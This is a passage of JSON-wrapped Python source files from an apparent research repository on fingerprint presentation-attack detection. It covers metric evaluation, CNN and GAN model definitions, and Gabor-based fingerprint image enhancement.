{}-th test batch'.format(i+1))\n\n # send mini-batch to gpu\n x = x.to(device)\n \n y = y.to(device)\n\n y_pred = model(x)\n\n y_pred = torch.mean(y_pred, dim=(1,2,3))\n\n # Compute cnn loss\n loss = loss_fn(y_pred, y)\n loss_eval += loss * x.shape[0]\n\n # Compute Acc\n N += x.shape[0]\n ypred_ = torch.round(sigmoid(y_pred))\n n_correct += torch.sum(1.*(ypred_ == y)).item()\n \n y = y.cpu().numpy()\n ypred_ = ypred_.cpu().numpy()\n \n # Biometric metrics\n \n TP += np.sum(np.logical_and(ypred_, y))\n TN += np.sum(np.logical_and(1-ypred_, 1-y))\n \n FP += np.sum(np.logical_and(ypred_, 1-y))\n FN += np.sum(np.logical_and(1-ypred_, y))\n \n PA += np.sum(y == 0)\n BF += np.sum(y == 1)\n \n probs = F.softmax(y_pred, 0)\n\n probs = probs.cpu().numpy()\n \n fpr, tpr, threshold = metrics.roc_curve(y, probs)\n fnr = 1 - tpr \n \n BPCER_APCER1_list.append(fpr[(np.abs(fnr - 0.01)).argmin()])\n BPCER_APCER5_list.append(fpr[(np.abs(fnr - 0.05)).argmin()])\n BPCER_APCER10_list.append(fpr[(np.abs(fnr - 0.1)).argmin()])\n \n APCER1_list.append(fnr[(np.abs(fnr - 0.01)).argmin()])\n APCER5_list.append(fnr[(np.abs(fnr - 0.05)).argmin()])\n APCER10_list.append(fnr[(np.abs(fnr - 0.1)).argmin()])\n \n index = _nanargmin(np.absolute((fnr - fpr)))\n if math.isnan(index) == False:\n eer_list.append(fpr[index])\n\n loss_eval = loss_eval / N\n acc = n_correct / N\n APCER = (FP * 1.) / (FP + TN)\n BPCER = (FN * 1.) 
/ (FN + TP)\n \n BPCER_APCER1=mean(BPCER_APCER1_list)\n BPCER_APCER5=mean(BPCER_APCER5_list)\n BPCER_APCER10=mean(BPCER_APCER10_list)\n \n APCER1=mean(APCER1_list)\n APCER5=mean(APCER5_list)\n APCER10=mean(APCER10_list)\n \n if eer_list != []:\n EER = mean(eer_list)\n else:\n EER = -1000000000\n \n return loss_eval, acc, APCER, BPCER, EER, BPCER_APCER1, BPCER_APCER5, BPCER_APCER10, APCER1, APCER5, APCER10 \n" }, { "alpha_fraction": 0.5385435223579407, "alphanum_fraction": 0.5506216883659363, "avg_line_length": 27.15999984741211, "blob_id": "14d610a5f07e1fd1752169fb44c2e5006e8208a4", "content_id": "b8720c4c22f46fa0a28133c877bdc845ea013664", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2815, "license_type": "no_license", "max_line_length": 77, "num_lines": 100, "path": "/CNNreg/layers/cnn2_layers.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nfrom torch import Tensor\n\n__negative_slope__ = 0.01\n\n\ndef get_activation_layer(activation):\n ''' Create activation layer '''\n if activation == 'relu':\n return nn.ReLU()\n elif activation == 'leaky_relu':\n return nn.LeakyReLU(__negative_slope__)\n elif activation == 'tanh':\n return nn.Tanh()\n else:\n errmsg = 'Invalid activation'\n raise Exception(errmsg)\n \ndef get_padding(kernel_size):\n ''' Compute padding '''\n if kernel_size % 2:\n padding = kernel_size // 2\n else:\n padding = (kernel_size - 1) // 2\n return padding\n\ndef BasicConvLayer(in_channels,\n out_channels,\n kernel_size,\n stride,\n bnorm=True,\n activation='relu',\n dropout=0.0,\n max_pool=False):\n ''' Create a composed conv layer\n (conv - bnorm - activation - dropout) '''\n # ModuleList of layers (Conv - bnorm - activation - dropout)\n padding = get_padding(kernel_size)\n layers = nn.ModuleList([\n nn.Conv2d(in_channels, out_channels, kernel_size, stride, 
padding)])\n\n if bnorm:\n layers.extend([nn.BatchNorm2d(out_channels)]) # Bnorm layer\n\n layers.extend([get_activation_layer(activation)]) # activation layer\n\n if dropout > 0.0:\n layers.extend([nn.Dropout2d(dropout)])\n \n if max_pool == True:\n layers.extend([nn.MaxPool2d(kernel_size=2, stride=2)])\n\n # Convert to Sequential\n BasicConv2D = nn.Sequential(*(layers))\n\n return BasicConv2D\n\ndef BasicDenseLayer(in_features,\n out_features,\n bnorm=True,\n activation='linear',\n dropout=0.0):\n ''' Create a composed dense layer\n (Linear - bnorm - activation - dropout) '''\n # ModuleList of layers (Linear - bnorm - activation - dropout)\n layers = nn.ModuleList([\n nn.Linear(in_features, out_features)\n ])\n\n if bnorm:\n layers.extend([nn.BatchNorm1d(out_features)]) # bnorm layer\n\n if activation != 'linear':\n layers.extend([get_activation_layer(activation)]) # activation layer\n\n if dropout > 0.0:\n layers.extend([nn.Dropout(dropout)])\n\n # Convert to Sequential\n BasicDense = nn.Sequential(*(layers))\n\n return BasicDense\n\n\nif __name__ == '__main__':\n\n a = BasicConvLayer(in_channels=1,\n out_channels=64,\n kernel_size=5,\n stride=2,\n bnorm=True,\n activation='relu')\n print(a)\n\n a = BasicDenseLayer(in_features=32,\n out_features=128,\n bnorm=True,\n activation='relu')\n print(a)" }, { "alpha_fraction": 0.4924646317958832, "alphanum_fraction": 0.5355900526046753, "avg_line_length": 28.346939086914062, "blob_id": "e533376120fd81425b33dc0670bd76c8709acd25", "content_id": "78f0c106d90ab1a6fd82d990eef8d307a409fabd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4313, "license_type": "no_license", "max_line_length": 133, "num_lines": 147, "path": "/II-GAN/models/gan.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from __future__ import print_function\nimport argparse\nimport os\nimport 
random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom statistics import mean\nimport sys\n\ndim = 128\n\n# Number of channels in the training images.\nnc = 1\n\n# Size of z latent vector (i.e. size of generator input)\nnz = 128\n\nclass Reshape(nn.Module):\n def __init__(self, N, C, H, W):\n super(Reshape, self).__init__()\n self.N = N\n self.C = C\n self.H = H\n self.W = W\n def forward(self, x):\n return x.view(self.N, self.C, self.H, self.W)\n\n\nclass DISCRIMINATOR(nn.Module):\n def __init__(self):\n super(DISCRIMINATOR, self).__init__()\n self.main = nn.Sequential(\n\n nn.Conv2d(1, 64, 3, 1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(0.2, inplace=True),\n \n nn.Conv2d(64, 64, 3, 2),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(64, 128, 3, 1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(128, 128, 3, 2),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(128, 256, 3, 1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(256, 256, 3, 1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(256, 256, 3, 1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2, inplace=True),\n\n nn.Conv2d(256, 256, 3, 2),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.2, inplace=True),\n\n Reshape(N=-1, C=23, H=23, W=256),\n nn.Linear(256, 1),\n Reshape(N=-1, C=1, H=23, W=23),\n\n )\n\n def forward(self, input):\n '''\n print(\"DISCRIMINATOR\")\n y = input\n print(input.shape)\n for i in range (len(self.main)):\n y = self.main[i](y)\n print(\"Layer \" + str(i))\n print(y.shape)\n '''\n return self.main(input)\n\n\nclass 
GENERATOR(nn.Module):\n def __init__(self, features = [64, 64, 64, 64, 64]):\n super(GENERATOR,self).__init__()\n \n conv_layers = []\n deconv_layers = []\n\n conv_layers.append(nn.Sequential(nn.Conv2d(1, features[0], kernel_size=3, stride=2, padding=1),\n nn.LeakyReLU(0.2, inplace=True)))\n for i in range(1, len(features)):\n conv_layers.append(nn.Sequential(nn.Conv2d(features[i-1], features[i], kernel_size=3, padding=1),\n nn.BatchNorm2d(features[i]),\n nn.LeakyReLU(0.2, inplace=True)))\n\n for i in range(len(features)):\n deconv_layers.append(nn.Sequential(nn.ConvTranspose2d(features[i], features[i-1], kernel_size=3, padding=1),\n nn.BatchNorm2d(features[i-1]),\n nn.ReLU(inplace=True)))\n \n deconv_layers.append(nn.Sequential(nn.ConvTranspose2d(features[-1], 1, kernel_size=3, stride=2, padding=1, output_padding=1),\n nn.Tanh())) \n \n \n self.encoder = nn.Sequential(*conv_layers)\n self.decoder = nn.Sequential(*deconv_layers)\n \n def forward(self,x):\n x = self.encoder(x)\n x = self.decoder(x)\n return x\n \nif __name__ == '__main__':\n\n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc. 
\n print(\"Running on the GPU...\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU...\")\n print()\n\n \n D = DISCRIMINATOR().to(DEVICE)\n G = GENERATOR().to(DEVICE)\n\n print(D)\n print(G)\n\n from torchsummary import summary\n\n summary(D, (1, 128, 128))" }, { "alpha_fraction": 0.5934514999389648, "alphanum_fraction": 0.6147236824035645, "avg_line_length": 31.88751792907715, "blob_id": "4ba483150f9e066a7f3dc6149115d1203867ea77", "content_id": "6c526a101eb3e3f1a5aa4bbe4ca329a6dddb2f74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23975, "license_type": "no_license", "max_line_length": 162, "num_lines": 729, "path": "/II-GAN/models/matcher.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 22 02:51:53 2016\n\n@author: utkarsh\n\"\"\"\n\n\n\n# FREQEST - Estimate fingerprint ridge frequency within image block\n#\n# Function to estimate the fingerprint ridge frequency within a small block\n# of a fingerprint image. This function is used by RIDGEFREQ\n#\n# Usage:\n# freqim = freqest(im, orientim, windsze, minWaveLength, maxWaveLength)\n#\n# Arguments:\n# im - Image block to be processed.\n# orientim - Ridge orientation image of image block.\n# windsze - Window length used to identify peaks. This should be\n# an odd integer, say 3 or 5.\n# minWaveLength, maxWaveLength - Minimum and maximum ridge\n# wavelengths, in pixels, considered acceptable.\n# \n# Returns:\n# freqim - An image block the same size as im with all values\n# set to the estimated ridge spatial frequency. 
If a\n# ridge frequency cannot be found, or cannot be found\n# within the limits set by min and max Wavlength\n# freqim is set to zeros.\n#\n# Suggested parameters for a 500dpi fingerprint image\n# freqim = freqest(im,orientim, 5, 5, 15);\n#\n# See also: RIDGEFREQ, RIDGEORIENT, RIDGESEGMENT\n\n### REFERENCES\n\n# Peter Kovesi \n# School of Computer Science & Software Engineering\n# The University of Western Australia\n# pk at csse uwa edu au\n# http://www.csse.uwa.edu.au/~pk\n\n\nimport numpy as np\nimport math\nimport scipy.ndimage\n#import cv2\ndef frequest(im,orientim,windsze,minWaveLength,maxWaveLength):\n rows,cols = np.shape(im);\n \n # Find mean orientation within the block. This is done by averaging the\n # sines and cosines of the doubled angles before reconstructing the\n # angle again. This avoids wraparound problems at the origin.\n \n \n cosorient = np.mean(np.cos(2*orientim));\n sinorient = np.mean(np.sin(2*orientim)); \n orient = math.atan2(sinorient,cosorient)/2;\n \n # Rotate the image block so that the ridges are vertical \n \n #ROT_mat = cv2.getRotationMatrix2D((cols/2,rows/2),orient/np.pi*180 + 90,1) \n #rotim = cv2.warpAffine(im,ROT_mat,(cols,rows))\n rotim = scipy.ndimage.rotate(im,orient/np.pi*180 + 90,axes=(1,0),reshape = False,order = 3,mode = 'nearest');\n\n # Now crop the image so that the rotated image does not contain any\n # invalid regions. 
This prevents the projection down the columns\n # from being mucked up.\n \n cropsze = int(np.fix(rows/np.sqrt(2)));\n offset = int(np.fix((rows-cropsze)/2));\n rotim = rotim[offset:offset+cropsze][:,offset:offset+cropsze];\n \n # Sum down the columns to get a projection of the grey values down\n # the ridges.\n \n proj = np.sum(rotim,axis = 0);\n dilation = scipy.ndimage.grey_dilation(proj, windsze,structure=np.ones(windsze));\n\n temp = np.abs(dilation - proj);\n \n peak_thresh = 2; \n \n maxpts = (temp<peak_thresh) & (proj > np.mean(proj));\n maxind = np.where(maxpts);\n \n rows_maxind,cols_maxind = np.shape(maxind);\n \n # Determine the spatial frequency of the ridges by divinding the\n # distance between the 1st and last peaks by the (No of peaks-1). If no\n # peaks are detected, or the wavelength is outside the allowed bounds,\n # the frequency image is set to 0 \n \n if(cols_maxind<2):\n freqim = np.zeros(im.shape);\n else:\n NoOfPeaks = cols_maxind;\n waveLength = (maxind[0][cols_maxind-1] - maxind[0][0])/(NoOfPeaks - 1);\n if waveLength>=minWaveLength and waveLength<=maxWaveLength:\n freqim = 1/np.double(waveLength) * np.ones(im.shape);\n else:\n freqim = np.zeros(im.shape);\n \n return(freqim);\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 22 03:15:03 2016\n\n@author: utkarsh\n\"\"\"\n\n\n# RIDGEFILTER - enhances fingerprint image via oriented filters\n#\n# Function to enhance fingerprint image via oriented filters\n#\n# Usage:\n# newim = ridgefilter(im, orientim, freqim, kx, ky, showfilter)\n#\n# Arguments:\n# im - Image to be processed.\n# orientim - Ridge orientation image, obtained from RIDGEORIENT.\n# freqim - Ridge frequency image, obtained from RIDGEFREQ.\n# kx, ky - Scale factors specifying the filter sigma relative\n# to the wavelength of the filter. This is done so\n# that the shapes of the filters are invariant to the\n# scale. 
kx controls the sigma in the x direction\n# which is along the filter, and hence controls the\n# bandwidth of the filter. ky controls the sigma\n# across the filter and hence controls the\n# orientational selectivity of the filter. A value of\n# 0.5 for both kx and ky is a good starting point.\n# showfilter - An optional flag 0/1. When set an image of the\n# largest scale filter is displayed for inspection.\n# \n# Returns:\n# newim - The enhanced image\n#\n# See also: RIDGEORIENT, RIDGEFREQ, RIDGESEGMENT\n\n# Reference: \n# Hong, L., Wan, Y., and Jain, A. K. Fingerprint image enhancement:\n# Algorithm and performance evaluation. IEEE Transactions on Pattern\n# Analysis and Machine Intelligence 20, 8 (1998), 777 789.\n\n### REFERENCES\n\n# Peter Kovesi \n# School of Computer Science & Software Engineering\n# The University of Western Australia\n# pk at csse uwa edu au\n# http://www.csse.uwa.edu.au/~pk\n\n\n\nimport numpy as np\nimport scipy;\ndef ridge_filter(im, orient, freq, kx, ky):\n angleInc = 3;\n im = np.double(im);\n rows,cols = im.shape;\n newim = np.zeros((rows,cols));\n \n freq_1d = np.reshape(freq,(1,rows*cols));\n ind = np.where(freq_1d>0);\n \n ind = np.array(ind);\n ind = ind[1,:]; \n \n # Round the array of frequencies to the nearest 0.01 to reduce the\n # number of distinct frequencies we have to deal with. 
\n \n non_zero_elems_in_freq = freq_1d[0][ind]; \n non_zero_elems_in_freq = np.double(np.round((non_zero_elems_in_freq*100)))/100;\n \n unfreq = np.unique(non_zero_elems_in_freq);\n\n # Generate filters corresponding to these distinct frequencies and\n # orientations in 'angleInc' increments.\n \n sigmax = 1/unfreq[0]*kx;\n sigmay = 1/unfreq[0]*ky;\n \n sze = np.round(3*np.max([sigmax,sigmay]));\n \n x,y = np.meshgrid(np.linspace(-sze,sze,(2*sze + 1)),np.linspace(-sze,sze,(2*sze + 1)));\n \n reffilter = np.exp(-(( (np.power(x,2))/(sigmax*sigmax) + (np.power(y,2))/(sigmay*sigmay)))) * np.cos(2*np.pi*unfreq[0]*x); # this is the original gabor filter\n \n filt_rows, filt_cols = reffilter.shape; \n \n gabor_filter = np.array(np.zeros((int(180/angleInc),int(filt_rows),int(filt_cols))));\n \n for o in range(0,int(180/angleInc)):\n \n # Generate rotated versions of the filter. Note orientation\n # image provides orientation *along* the ridges, hence +90\n # degrees, and imrotate requires angles +ve anticlockwise, hence\n # the minus sign. 
\n \n rot_filt = scipy.ndimage.rotate(reffilter,-(o*angleInc + 90),reshape = False);\n gabor_filter[o] = rot_filt;\n \n # Find indices of matrix points greater than maxsze from the image\n # boundary\n \n maxsze = int(sze); \n\n temp = freq>0; \n validr,validc = np.where(temp) \n \n temp1 = validr>maxsze;\n temp2 = validr<rows - maxsze;\n temp3 = validc>maxsze;\n temp4 = validc<cols - maxsze;\n \n final_temp = temp1 & temp2 & temp3 & temp4; \n \n finalind = np.where(final_temp);\n \n # Convert orientation matrix values from radians to an index value\n # that corresponds to round(degrees/angleInc) \n \n maxorientindex = np.round(180/angleInc);\n orientindex = np.round(orient/np.pi*180/angleInc);\n \n #do the filtering \n \n for i in range(0,rows):\n for j in range(0,cols):\n if(orientindex[i][j] < 1):\n orientindex[i][j] = orientindex[i][j] + maxorientindex;\n if(orientindex[i][j] > maxorientindex):\n orientindex[i][j] = orientindex[i][j] - maxorientindex;\n finalind_rows,finalind_cols = np.shape(finalind);\n sze = int(sze);\n for k in range(0,finalind_cols):\n r = validr[finalind[0][k]];\n c = validc[finalind[0][k]];\n \n img_block = im[r-sze:r+sze + 1][:,c-sze:c+sze + 1];\n \n newim[r][c] = np.sum(img_block * gabor_filter[int(orientindex[r][c]) - 1]);\n \n return(newim); \n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 19 12:14:49 2016\n\n@author: utkarsh\n\"\"\"\n\n\n# RIDGEFREQ - Calculates a ridge frequency image\n#\n# Function to estimate the fingerprint ridge frequency across a\n# fingerprint image. 
This is done by considering blocks of the image and\n# determining a ridgecount within each block by a call to FREQEST.\n#\n# Usage:\n# [freqim, medianfreq] = ridgefreq(im, mask, orientim, blksze, windsze, ...\n# minWaveLength, maxWaveLength)\n#\n# Arguments:\n# im - Image to be processed.\n# mask - Mask defining ridge regions (obtained from RIDGESEGMENT)\n# orientim - Ridge orientation image (obtained from RIDGORIENT)\n# blksze - Size of image block to use (say 32) \n# windsze - Window length used to identify peaks. This should be\n# an odd integer, say 3 or 5.\n# minWaveLength, maxWaveLength - Minimum and maximum ridge\n# wavelengths, in pixels, considered acceptable.\n# \n# Returns:\n# freqim - An image the same size as im with values set to\n# the estimated ridge spatial frequency within each\n# image block. If a ridge frequency cannot be\n# found within a block, or cannot be found within the\n# limits set by min and max Wavlength freqim is set\n# to zeros within that block.\n# medianfreq - Median frequency value evaluated over all the\n# valid regions of the image.\n#\n# Suggested parameters for a 500dpi fingerprint image\n# [freqim, medianfreq] = ridgefreq(im,orientim, 32, 5, 5, 15);\n#\n\n# See also: RIDGEORIENT, FREQEST, RIDGESEGMENT\n\n# Reference: \n# Hong, L., Wan, Y., and Jain, A. K. Fingerprint image enhancement:\n# Algorithm and performance evaluation. 
IEEE Transactions on Pattern\n# Analysis and Machine Intelligence 20, 8 (1998), 777 789.\n\n### REFERENCES\n\n# Peter Kovesi \n# School of Computer Science & Software Engineering\n# The University of Western Australia\n# pk at csse uwa edu au\n# http://www.csse.uwa.edu.au/~pk\n\n\n\nimport numpy as np\n#import math\n#import scipy.ndimage\n\ndef ridge_freq(im, mask, orient, blksze, windsze,minWaveLength, maxWaveLength):\n rows,cols = im.shape;\n freq = np.zeros((rows,cols));\n \n for r in range(0,rows-blksze,blksze):\n for c in range(0,cols-blksze,blksze):\n blkim = im[r:r+blksze][:,c:c+blksze];\n blkor = orient[r:r+blksze][:,c:c+blksze];\n \n \n freq[r:r+blksze][:,c:c+blksze] = frequest(blkim,blkor,windsze,minWaveLength,maxWaveLength);\n \n freq = freq*mask;\n freq_1d = np.reshape(freq,(1,rows*cols));\n ind = np.where(freq_1d>0);\n \n ind = np.array(ind);\n ind = ind[1,:]; \n \n non_zero_elems_in_freq = freq_1d[0][ind]; \n \n meanfreq = np.mean(non_zero_elems_in_freq);\n medianfreq = np.median(non_zero_elems_in_freq); # does not work properly\n return(freq,meanfreq)\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 22 03:02:23 2016\n\n@author: utkarsh\n\"\"\"\n\nimport numpy as np\n#import math\n#import scipy.ndimage\n\ndef rifdge_freq(im, mask, orient, blksze, windsze,minWaveLength, maxWaveLength):\n rows,cols = im.shape;\n freq = np.zeros((rows,cols));\n \n for r in range(0,rows-blksze,blksze):\n for c in range(0,cols-blksze,blksze):\n blkim = im[r:r+blksze][:,c:c+blksze];\n blkor = orient[r:r+blksze][:,c:c+blksze];\n \n \n freq[r:r+blksze][:,c:c+blksze] = frequest(blkim,blkor,windsze,minWaveLength,maxWaveLength);\n \n freq = freq*mask;\n freq_1d = np.reshape(freq,(1,rows*cols));\n ind = np.where(freq_1d>0);\n \n ind = np.array(ind);\n ind = ind[1,:]; \n \n non_zero_elems_in_freq = freq_1d[0][ind]; \n \n medianfreq = np.median(non_zero_elems_in_freq);\n \n return(medianfreq)\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 19 11:31:54 2016\n\n@author: 
utkarsh\n\"\"\"\n\n\n\n# RIDGEORIENT - Estimates the local orientation of ridges in a fingerprint\n#\n# Usage: [orientim, reliability, coherence] = ridgeorientation(im, gradientsigma,...\n# blocksigma, ...\n# orientsmoothsigma)\n#\n# Arguments: im - A normalised input image.\n# gradientsigma - Sigma of the derivative of Gaussian\n# used to compute image gradients.\n# blocksigma - Sigma of the Gaussian weighting used to\n# sum the gradient moments.\n# orientsmoothsigma - Sigma of the Gaussian used to smooth\n# the final orientation vector field. \n# Optional: if ommitted it defaults to 0\n# \n# Returns: orientim - The orientation image in radians.\n# Orientation values are +ve clockwise\n# and give the direction *along* the\n# ridges.\n# reliability - Measure of the reliability of the\n# orientation measure. This is a value\n# between 0 and 1. I think a value above\n# about 0.5 can be considered 'reliable'.\n# reliability = 1 - Imin./(Imax+.001);\n# coherence - A measure of the degree to which the local\n# area is oriented.\n# coherence = ((Imax-Imin)./(Imax+Imin)).^2;\n#\n# With a fingerprint image at a 'standard' resolution of 500dpi suggested\n# parameter values might be:\n#\n# [orientim, reliability] = ridgeorient(im, 1, 3, 3);\n#\n# See also: RIDGESEGMENT, RIDGEFREQ, RIDGEFILTER\n\n### REFERENCES\n\n# May 2003 Original version by Raymond Thai, \n# January 2005 Reworked by Peter Kovesi \n# October 2011 Added coherence computation and orientsmoothsigma made optional\n#\n# School of Computer Science & Software Engineering\n# The University of Western Australia\n# pk at csse uwa edu au\n# http://www.csse.uwa.edu.au/~pk\n\n\nimport numpy as np;\nimport cv2;\nfrom scipy import ndimage;\nfrom scipy import signal\n\ndef ridge_orient(im, gradientsigma, blocksigma, orientsmoothsigma):\n rows,cols = im.shape;\n #Calculate image gradients.\n sze = np.fix(6*gradientsigma);\n if np.remainder(sze,2) == 0:\n sze = sze+1;\n \n gauss = 
cv2.getGaussianKernel(np.int(sze),gradientsigma);\n f = gauss * gauss.T;\n \n fy,fx = np.gradient(f); #Gradient of Gaussian\n \n #Gx = ndimage.convolve(np.double(im),fx);\n #Gy = ndimage.convolve(np.double(im),fy);\n \n Gx = signal.convolve2d(im,fx,mode='same'); \n Gy = signal.convolve2d(im,fy,mode='same');\n \n Gxx = np.power(Gx,2);\n Gyy = np.power(Gy,2);\n Gxy = Gx*Gy;\n \n #Now smooth the covariance data to perform a weighted summation of the data. \n \n sze = np.fix(6*blocksigma);\n \n gauss = cv2.getGaussianKernel(np.int(sze),blocksigma);\n f = gauss * gauss.T;\n \n Gxx = ndimage.convolve(Gxx,f);\n Gyy = ndimage.convolve(Gyy,f);\n Gxy = 2*ndimage.convolve(Gxy,f);\n \n # Analytic solution of principal direction\n denom = np.sqrt(np.power(Gxy,2) + np.power((Gxx - Gyy),2)) + np.finfo(float).eps;\n \n sin2theta = Gxy/denom; # Sine and cosine of doubled angles\n cos2theta = (Gxx-Gyy)/denom;\n \n \n if orientsmoothsigma:\n sze = np.fix(6*orientsmoothsigma);\n if np.remainder(sze,2) == 0:\n sze = sze+1; \n gauss = cv2.getGaussianKernel(np.int(sze),orientsmoothsigma);\n f = gauss * gauss.T;\n cos2theta = ndimage.convolve(cos2theta,f); # Smoothed sine and cosine of\n sin2theta = ndimage.convolve(sin2theta,f); # doubled angles\n \n orientim = np.pi/2 + np.arctan2(sin2theta,cos2theta)/2;\n return(orientim);\n\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 18 23:04:30 2016\n\n@author: utkarsh\n\"\"\"\n\n\n\n# RIDGESEGMENT - Normalises fingerprint image and segments ridge region\n#\n# Function identifies ridge regions of a fingerprint image and returns a\n# mask identifying this region. It also normalises the intesity values of\n# the image so that the ridge regions have zero mean, unit standard\n# deviation.\n#\n# This function breaks the image up into blocks of size blksze x blksze and\n# evaluates the standard deviation in each region. 
If the standard\n# deviation is above the threshold it is deemed part of the fingerprint.\n# Note that the image is normalised to have zero mean, unit standard\n# deviation prior to performing this process so that the threshold you\n# specify is relative to a unit standard deviation.\n#\n# Usage: [normim, mask, maskind] = ridgesegment(im, blksze, thresh)\n#\n# Arguments: im - Fingerprint image to be segmented.\n# blksze - Block size over which the the standard\n# deviation is determined (try a value of 16).\n# thresh - Threshold of standard deviation to decide if a\n# block is a ridge region (Try a value 0.1 - 0.2)\n#\n# Returns: normim - Image where the ridge regions are renormalised to\n# have zero mean, unit standard deviation.\n# mask - Mask indicating ridge-like regions of the image, \n# 0 for non ridge regions, 1 for ridge regions.\n# maskind - Vector of indices of locations within the mask. \n#\n# Suggested values for a 500dpi fingerprint image:\n#\n# [normim, mask, maskind] = ridgesegment(im, 16, 0.1)\n#\n# See also: RIDGEORIENT, RIDGEFREQ, RIDGEFILTER\n\n### REFERENCES\n\n# Peter Kovesi \n# School of Computer Science & Software Engineering\n# The University of Western Australia\n# pk at csse uwa edu au\n# http://www.csse.uwa.edu.au/~pk\n\n\nimport numpy as np\n\ndef normalise(img,mean,std):\n normed = (img - np.mean(img))/(np.std(img)); \n return(normed)\n \ndef ridge_segment(im,blksze,thresh):\n \n rows,cols = im.shape; \n \n im = normalise(im,0,1); # normalise to get zero mean and unit standard deviation\n \n \n new_rows = np.int(blksze * np.ceil((np.float(rows))/(np.float(blksze))))\n new_cols = np.int(blksze * np.ceil((np.float(cols))/(np.float(blksze))))\n \n padded_img = np.zeros((new_rows,new_cols));\n stddevim = np.zeros((new_rows,new_cols));\n \n padded_img[0:rows][:,0:cols] = im;\n \n for i in range(0,new_rows,blksze):\n for j in range(0,new_cols,blksze):\n block = padded_img[i:i+blksze][:,j:j+blksze];\n \n stddevim[i:i+blksze][:,j:j+blksze] = 
np.std(block)*np.ones(block.shape)\n \n stddevim = stddevim[0:rows][:,0:cols]\n \n mask = stddevim > thresh;\n \n mean_val = np.mean(im[mask]);\n \n std_val = np.std(im[mask]);\n \n normim = (im - mean_val)/(std_val);\n \n return(normim,mask)\n\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 18 22:50:30 2016\n\n@author: utkarsh\n\"\"\"\n\ndef image_enhance(img):\n blksze = 16;\n thresh = 0.1;\n normim,mask = ridge_segment(img,blksze,thresh); # normalise the image and find a ROI\n\n\n gradientsigma = 1;\n blocksigma = 7;\n orientsmoothsigma = 7;\n orientim = ridge_orient(normim, gradientsigma, blocksigma, orientsmoothsigma); # find orientation of every pixel\n\n\n blksze = 38;\n windsze = 5;\n minWaveLength = 5;\n maxWaveLength = 15;\n freq,medfreq = ridge_freq(normim, mask, orientim, blksze, windsze, minWaveLength,maxWaveLength); #find the overall frequency of ridges\n \n \n freq = medfreq*mask;\n kx = 0.65;ky = 0.65;\n newim = ridge_filter(normim, orientim, freq, kx, ky); # create gabor filter and do the actual filtering\n \n \n #th, bin_im = cv2.threshold(np.uint8(newim),0,255,cv2.THRESH_BINARY);\n return(newim < -3)\n\nimport cv2\nimport os\nimport sys\nimport numpy\nimport matplotlib.pyplot as plt\nfrom skimage.morphology import skeletonize, thin\nimport math\n\ndef removedot(invertThin):\n temp0 = numpy.array(invertThin[:])\n temp0 = numpy.array(temp0)\n temp1 = temp0/255\n temp2 = numpy.array(temp1)\n temp3 = numpy.array(temp2)\n\n enhanced_img = numpy.array(temp0)\n filter0 = numpy.zeros((10,10))\n W,H = temp0.shape[:2]\n filtersize = 6\n\n for i in range(W - filtersize):\n for j in range(H - filtersize):\n filter0 = temp1[i:i + filtersize,j:j + filtersize]\n\n flag = 0\n if sum(filter0[:,0]) == 0:\n flag +=1\n if sum(filter0[:,filtersize - 1]) == 0:\n flag +=1\n if sum(filter0[0,:]) == 0:\n flag +=1\n if sum(filter0[filtersize - 1,:]) == 0:\n flag +=1\n if flag > 3:\n temp2[i:i + filtersize, j:j + filtersize] = numpy.zeros((filtersize, 
